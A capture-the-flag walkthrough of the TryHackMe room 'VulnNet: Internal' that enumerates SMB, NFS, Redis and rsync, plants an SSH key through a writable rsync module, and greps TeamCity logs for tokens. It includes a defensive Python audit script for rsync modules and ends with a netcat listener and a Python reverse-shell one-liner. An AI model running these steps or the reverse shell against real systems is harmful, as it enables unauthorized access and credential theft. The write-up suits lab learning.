VulnNet: Internal
Room Link: https://tryhackme.com/room/vulnnetinternal
Initial Scan
Kali
nmap -A $VICTIM


Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/139 - NetBIOS
nbtscan $VICTIM

TCP/445 - SMB
The first flag is in the SMB share.
Kali
smbget -R smb://$VICTIM/shares
smbclient \\\\$VICTIM\\shares
smb: \> cd temp
smb: \temp\> get services.txt
smb: \temp\> cd ..
smb: \> cd data
smb: \data\> get data.txt
smb: \data\> get business-req.txt

TCP/2049 - NFS
Kali
showmount -e $VICTIM
mkdir /mnt/nfs
mount $VICTIM:/opt/conf /mnt/nfs
cd /mnt/nfs
cat redis/redis.conf

TCP/6379 - Redis

Kali
redis-cli -h $VICTIM -a "B65Hx562F@ggAZ@F"
10.10.232.200:6379> KEYS *
10.10.232.200:6379> KEYS "internal flag"
10.10.232.200:6379> GET "internal flag"

Kali
KEYS "authlist"
LRANGE authlist 1 100

Kali
echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d

TCP/873 - RSYNC
We are able to transfer our key, which allows us to log in as the sys-internal user.
Kali
rsync --list-only rsync://$VICTIM
rsync --list-only rsync://rsync-connect@$VICTIM/files
Password: Hcg3HP67@TW@Bc72v
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub authorized_keys
rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh
Password: Hcg3HP67@TW@Bc72v
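
Added example, not part of the original walkthrough: a defender-side check for the weakness this step relies on, a writable rsync module whose path contains a login account's home directory. The rsyncd.conf text and home paths are constructed samples (only the module name `files` and the user names come from the steps above), and the parser handles the basic `name = value` syntax only.

```python
import os

TRUE_VALUES = {"yes", "true", "1"}

def parse_rsyncd_conf(text):
    """Parse rsyncd.conf text into {module: params}; global params act as module defaults."""
    defaults, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules[current] = dict(defaults)
        elif line and not line.startswith("#") and "=" in line:
            name, value = line.split("=", 1)
            key = "".join(name.split()).lower()  # whitespace in parameter names is ignored
            (defaults if current is None else modules[current])[key] = value.strip()
    return modules

def covers(module_path, home):
    """True when home is the module path itself or lies beneath it."""
    module_path, home = os.path.realpath(module_path), os.path.realpath(home)
    return os.path.commonpath([module_path, home]) == module_path

def audit(conf_text, homes=None):
    """Return (module, user) pairs where a writable module contains that user's home."""
    if homes is None:  # default: the accounts that exist on this host
        import pwd
        homes = {p.pw_name: p.pw_dir for p in pwd.getpwall()}
    findings = []
    for module, params in parse_rsyncd_conf(conf_text).items():
        # rsync modules are read-only by default; anything not clearly true counts as writable
        writable = params.get("readonly", "yes").lower() not in TRUE_VALUES
        path = params.get("path", "")
        if not writable or not os.path.isabs(path):
            continue
        findings += [(module, user) for user, home in sorted(homes.items())
                     if os.path.isabs(home) and covers(path, home)]
    return findings

# Constructed sample, not the room's real rsyncd.conf.
SAMPLE_CONF = """\
[files]
path = /home
read only = false
auth users = rsync-connect
[backup]
path = /srv/backup
read only = yes
"""
SAMPLE_HOMES = {"sys-internal": "/home/sys-internal", "root": "/root"}

if __name__ == "__main__":
    print(audit(SAMPLE_CONF, SAMPLE_HOMES))
```

Each pair it reports is a module through which `~/.ssh/authorized_keys` of that user can be overwritten by anyone holding the module's rsync credentials; setting `read only = yes` or moving the module path out of the home tree clears the finding.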

TCP/22 - SSH
Kali
ssh sys-internal@$VICTIM
Victim
ss -ltp

Kali
ssh -D 9050 sys-internal@$VICTIM


Enter the token in the Authentication token field. Multiple tokens were listed; the correct one was the last.
Victim
grep -iR token /TeamCity/logs/ 2>/dev/null







Kali
nc -lvnp 1337
Custom script
export RHOST="$KALI";export RPORT=1337;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'


